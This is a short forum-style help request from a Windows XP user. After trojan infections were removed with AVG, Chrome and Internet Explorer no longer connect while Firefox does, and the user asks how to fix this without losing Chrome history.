    I cannot connect to the internet with Chrome or Internet Explorer. Firefox works fine. It seems it happens when I was infected by a "Trojan Horse Generic 17.BWIK", "Trojan Horse SHeur.UHL" and "Fake_Antispyware.FAH". I have removed the threats using AVG anti-virus security. I got Firefox working, but Chrome and IE still cannot connect. I do not want to loose Chrome History so re-setting would be my last option and uninstall and install will be out of the question. Is there a way around this? I am using XP Pro on a desktop and DSL connection.

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